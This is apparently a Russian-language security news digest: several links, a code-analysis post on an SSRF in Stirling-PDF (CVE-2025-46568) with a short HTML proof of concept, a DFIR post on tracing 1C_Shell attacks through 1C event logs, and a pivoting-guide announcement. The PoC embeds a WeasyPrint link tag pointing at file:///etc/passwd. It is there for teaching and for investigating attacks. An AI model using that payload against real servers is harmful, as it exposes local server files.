Fsecurity | HH

👾 Напоминаю, что Obsidian Pentest обновляется! [📃] Коммит

🔗Ссылка: https://www.synacktiv.com/en/publications/exploiting-the-tesla-wall-connector-from-its-charge-port-connector

🔗Ссылка: https://blog.doyensec.com/2025/01/09/cspt-file-upload.html

🔗Ссылка: https://habr.com/ru/companies/yougile/articles/920180/

🔗Ссылка: https://opennet.ru/63437/

Сегодня в лайв-режиме знакомились с анализом кода на примере SSRF в Stirling-PDF (CVE-2025-46568): чтение локальных файлов через WeasyPrint. Не было особо важно, какая CVE. Главное — потренировать анализ кода 🏃‍♂️ Stirling-PDF — это веб-приложение для работы с PDF (конвертация, редактирование). В версиях до 0.45.0 обнаружена SSRF-уязвимость, позволяющая атакующему читать локальные файлы на сервере через обработку HTML в WeasyPrint ⚠️ Суть уязвимости: 1. Приложение некорректно фильтрует HTML-контент, загруженный по URL; 2. WeasyPrint поддерживает тег <link rel="attachment">, который встраивает локальные файлы (file://) в PDF как скрытые вложения. Основная ошибка — отсутствие санитизации HTML перед рендерингом:

// 1. Принимает URL и проверяет только схему http/https
if (!URL.matches("^https?://.*") || !GeneralUtils.isValidURL(URL)) {
    throw new IllegalArgumentException("Invalid URL format provided.");
}

// 2. Передаёт URL в WeasyPrint без очистки HTML
List<String> command = new ArrayList<>();
command.add(runtimePathConfig.getWeasyPrintPath());
command.add(URL);  // HTML может содержать <link rel="attachment" href="file:///etc/passwd">
command.add("--pdf-forms");
command.add(tempOutputFile.toString());

// 3. WeasyPrint рендерит PDF с вложенными файлами
ProcessExecutor.runCommandWithOutputHandling(command);

PoC:

<!DOCTYPE html>
<html>
<head>
    <link rel="attachment" href="file:///etc/passwd">
</head>
<body></body>
</html>

Если Вам интересен анализ кода или Вы хотите познакомиться, присоединяйтесь к Discord и заходите на следующие встречи! 🔍

🔗Ссылка: https://habr.com/ru/articles/920168/

🔗Ссылка: https://habr.com/ru/companies/pt/articles/920062/

Всем привет! Приятного чтения и пятничного вечера🔥 https://teletype.in/@r00t_owl/7x0sHFrqYPM

Новое обновление будет больше user-friendly (почти все по запросу пользователей) и многое подготовит для сдедующего апдейта. Часть того, что будет: * добавлена еще одна тема, на базе Dracula; * настройки теперь применяются без перезагрузки клиента; * консоль агента полностью переработана. Теперь в ней есть поиск и свое меню с настройками. Устранены лаги с цветами и шрифтами * некоторые заголовки в таблице сессий динамические, можно расширять как угодно

Пару дней назад сделал коммит в radare2 и теперь вот так он может выглядеть сразу из коробки. Инфраструктура для реверс-инжиниринга Radare2 достаточно сложна для новичка, тк сильно завязана на хоткеях и не имеет большого встроенного визуала. Теперь с новыми дефолтными панелями можно комфортно дебажить x86 и x86_64 с декомпиляцией и подсветкой кода, просматривать регистры, переменные, стэк и видеть какие байты читаются/пишутся в памяти. Максимально стилизированно под ollydbg, стандарт в дебагинге. И раз radare2 это в первую очередь SBA, то такой подход можно применять не только в динамике (отладке), но и в статическом анализе, благодаря встроенному эмулятору ESIL.

🔗Ссылка: https://habr.com/ru/articles/919784/

🔗Ссылка: https://habr.com/ru/companies/cyberok/articles/919916/

По следам 1C_Shell. Расследуем атаки с помощью журнала регистрации 🐾 В одном из предыдущих постов мы писали об обнаружении атак на систему «1С», в которых злоумышленники использовали инструмент 1C_shell. Он представляет собой внешнюю обработку, позволяющую запустить произвольный код на сервере «1С:Предприятие». Подобные атаки интересны тем, что оставляют мало очевидных следов в скомпрометированных системах. В частности, тяжело определить источник атаки, особенно в условиях ротации журналов событий Windows. Одним из артефактов, которые могут нам помочь в расследовании, является журнал регистрации. 💡 Журнал регистрации — механизм в системе «1С», предназначенный для логирования действия пользователей, в том числе начала и завершения сессий. Чтобы просмотреть журнал регистрации, перейдем в конфигуратор и на вкладке «Администрирование» выберем соответствующий пункт (скриншот 1). В журнале, помимо всего прочего, мы можем увидеть события начала и завершения пользовательских сеансов (скриншот 2). Таким образом, зная временной промежуток, в рамках которого происходила вредоносная активность, мы определим подозрительные сессии. В рамках этих сессий злоумышленники могли выполнять команды. Файлы журнала регистрации в случае клиент-серверного варианта информационной базы по умолчанию хранятся в рабочей папке кластера:

C:\Program Files\1cv8\srvinfo\reg_****\****\1Cv8Log

Логи имеют необычный формат и плохо пригодны для ручного анализа. О формате можно почитать в статье «Инфостарт»: описание актуально для «1С:Предприятия» версий 8.1 и 8.2, но с тех пор формат изменился незначительно. 💡 Актуальная структура журнала регистрации описана в Руководстве администратора «1С:Предприятия» — однако доступ к документу ограничен. Для того чтобы распарсить файлы журнала регистрации, можно воспользоваться встроенной консольной утилитой ibcmd, предназначенной для администрирования сервера «1С». Она входит в комплект, поставляемый при установке «1С:Предприятия», и, начиная с версии 8.3.25, имеет функциональность для обработки файлов журнала регистрации. Утилита расположена в папке C:\Program Files\1cv8\<version>\bin. Папку можно скопировать и использовать на другом компьютере без необходимости устанавливать систему «1С». Документацию утилиты также можно найти в Руководстве администратора. Для того чтобы распарсить журнал регистрации и на выходе получить файл формата JSONL, можно использовать следующую команду:

ibcmd.exe eventlog export -f json --skip-root -o C:\<output_path> \output.jsonl C:\<path_to_1Cv8Log>

Пример выходной строки:

{"ApplicationName":"1CV8C","ApplicationPresentation":"Тонкий клиент","Comment":"","Computer":"DESKTOP-QBF9N0A","Connection":"25","Data":null,"DataPresentation":"","Date":"2025-06-02T17:38:31","Event":"_$Session$_.Start","EventPresentation":"Сеанс. Начало","Level":"Information","Metadata":"00000000-0000-0000-0000-000000000000","MetadataPresentation":"<Не определено 00000000-0000-0000-0000-000000000000>","Port":"1560","ServerName":"WIN-UB4CFT0Q9FN","Session":"1","SessionDataSeparation":null,"SessionDataSeparationPresentation":null,"SyncPort":"0","TransactionID":"","TransactionStatus":"NotApplicable","User":"071523a4-516f-4fce-ba4b-0d11ab7a1893","UserName":""}
{"ApplicationName":"1CV8C","ApplicationPresentation":"Тонкий клиент","Comment":"","Computer":"DESKTOP-QBF9N0A","Connection":"0","Data":null,"DataPresentation":"","Date":"2025-06-02T17:38:57","Event":"_$Session$_.Finish","EventPresentation":"Сеанс. Завершение","Level":"Information","Metadata":"00000000-0000-0000-0000-000000000000","MetadataPresentation":"<Не определено 00000000-0000-0000-0000-000000000000>","Port":"0","ServerName":"","Session":"1","SessionDataSeparation":null,"SessionDataSeparationPresentation":null,"SyncPort":"0","TransactionID":"","TransactionStatus":"NotApplicable","User":"071523a4-516f-4fce-ba4b-0d11ab7a1893","UserName":""}

#ir #detect #dfir #malware @ptescalator

🔗Ссылка: https://opennet.ru/63431/

🔗Ссылка: https://habr.com/ru/companies/pt/articles/919358/

🔗Ссылка: https://www.securitylab.ru/news/560512.php

👨‍💻 Развёрнутый гайд по Pivoting для новичков. • Pivoting - один из этапов взлома, когда атакующий создает для себя точку опоры в скомпрометированной системе, плацдарм для дальнейшего проникновения. О приемах, которые для этого применяются, мы сегодня и поговорим. Гайд состоит из двух частей и включает следующую информацию: • Часть 1: ➡Что это такое, какие виды бывают и для чего; ➡Обзор лаборатории; ➡Практика Pivoting; ➡Практика Port Forwarding; ➡Заключение. • Часть 2: ➡Обзор лаборатории; ➡Remote Port Forwarding; ➡Практика Pivoting (Double Pivoting); ➡SMB Named Pipes; ➡Заключение. ➡ Скачать материал можно в нашем облаке. ➡ Источник: https://xss.is ➡ Автор: @hermano • Дополнительно: Linux for Hackers. File Transfers - первая проблема, с которой атакующий сталкивается на этапе pivoting’а — это передача файлов. Порой нужно залить на удаленный хост эксплойт для повышения привилегий, скачать документ, дамп памяти, поднять прокси-сервер и т.д... Специфика передачи данных обусловлена необходимостью выполнить ее исключительно базовыми средствами ОС. О таких методах и средствах подробно будет описано в данной статье. S.E. ▪️ infosec.work ▪️ VT